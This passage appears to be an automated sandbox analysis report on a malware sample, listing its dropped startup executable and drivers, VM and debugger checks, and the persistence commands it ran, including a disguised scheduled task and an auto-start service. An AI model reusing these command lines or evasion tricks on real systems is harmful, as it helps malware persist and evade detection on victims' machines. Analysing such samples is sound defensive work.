      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /v /fo csv
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: BiXS3FRoLe.exeStatic file information: File size 1257984 > 1048576
      Source: BiXS3FRoLe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: BiXS3FRoLe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: BiXS3FRoLe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: BiXS3FRoLe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: BiXS3FRoLe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: BiXS3FRoLe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: BiXS3FRoLe.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: BiXS3FRoLe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: BiXS3FRoLe.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: BiXS3FRoLe.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: BiXS3FRoLe.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: BiXS3FRoLe.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: BiXS3FRoLe.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B100BB LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00B100BB
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B01557 push ecx; ret 0_2_00B0156A
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B01BB6 push ecx; ret 0_2_00B01BC9
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000A1557 push ecx; ret 48_2_000A156A
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000A1BB6 push ecx; ret 48_2_000A1BC9

      Persistence and Installation Behavior

      barindex
      Sample is not signed and drops a device driver
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile created: C:\Windows\SysMain.sysJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile created: C:\Users\user\AppData\N-Save.sysJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeJump to dropped file

      Boot Survival

      barindex
      Drops PE files to the startup folder
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeJump to dropped file
      Uses schtasks.exe or at.exe to add and modify task schedules
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe\:Zone.Identifier:$DATAJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe\:Zone.Identifier:$DATAJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto

      Hooking and other Techniques for Hiding and Protection

      barindex
      Uses known network protocols on non-standard ports
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 3586
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00AE9908 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00AE9908
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
      Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeAPI coverage: 9.2 %
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeAPI coverage: 2.5 %
      Source: C:\Windows\SysWOW64\timeout.exe TID: 7468Thread sleep count: 119 > 30
      Source: C:\Windows\SysWOW64\timeout.exe TID: 5844Thread sleep count: 131 > 30
      Source: C:\Windows\SysWOW64\timeout.exe TID: 8012Thread sleep count: 131 > 30
      Source: C:\Windows\SysWOW64\timeout.exe TID: 7540Thread sleep count: 128 > 30
      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A88240 SetErrorMode,FindFirstFileW,0_2_00A88240
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A88380 SetErrorMode,FindFirstFileW,SetErrorMode,FindFirstFileW,0_2_00A88380
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A89ABA lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,SetErrorMode,FindFirstFileW,0_2_00A89ABA
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A8AF50 SetErrorMode,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,0_2_00A8AF50
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B3BA6B FindFirstFileExA,0_2_00B3BA6B
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00028240 SetErrorMode,FindFirstFileW,48_2_00028240
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00028380 SetErrorMode,FindFirstFileW,SetErrorMode,FindFirstFileW,48_2_00028380
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_0002AF50 SetErrorMode,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,48_2_0002AF50
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000DBA6B FindFirstFileExA,48_2_000DBA6B
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_00029ABA lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,SetErrorMode,FindFirstFileW,48_2_00029ABA
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A8D950 GetLogicalDriveStringsA,0_2_00A8D950
      Source: BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000D29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
      Source: svchost.exe, 00000009.00000002.2504829562.000001E74C64F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
      Source: svchost.exe, 00000009.00000002.2504676976.000001E74C62B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000CF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: wscript.exe, 00000026.00000002.1340054340.000001F1F6C8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
      Source: svchost.exe, 00000009.00000002.2504497159.000001E74C602000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
      Source: svchost.exe, 00000009.00000002.2505170981.000001E74C68E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
      Source: svchost.exe, 00000009.00000002.2504676976.000001E74C62B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
      Source: svchost.exe, 00000009.00000002.2505013739.000001E74C664000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000es
      Source: svchost.exe, 00000009.00000002.2504829562.000001E74C64F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
      Source: svchost.exe, 00000009.00000002.2504829562.000001E74C64F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\\?\Volume{1a4b1382-eeb5-4d59-b0fa-b93f83a518e1}\
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B24F58 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B24F58
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B100BB LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00B100BB
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B20E79 mov eax, dword ptr fs:[00000030h]0_2_00B20E79
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000C0E79 mov eax, dword ptr fs:[00000030h]48_2_000C0E79
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B002E0 TlsGetValue,TlsSetValue,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00B002E0
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B24F58 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B24F58
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B0176D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00B0176D
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B01968 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B01968
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B01ACA SetUnhandledExceptionFilter,0_2_00B01ACA
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000C4F58 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,48_2_000C4F58
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000A176D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,48_2_000A176D
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000A1968 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,48_2_000A1968
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000A1ACA SetUnhandledExceptionFilter,48_2_000A1ACA
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"Jump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=autoJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= autoJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= autoJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c verJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.batJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /fJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo %date%-%time%Jump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"Jump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"Jump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c verJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /v /fo csvJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i "dcdcf"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=autoJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= autoJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= autoJump to behavior
